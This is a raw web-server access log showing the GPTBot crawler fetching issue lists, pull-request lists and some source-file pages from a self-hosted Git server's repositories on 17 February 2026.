[Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11437] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11437] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11296] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:19:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 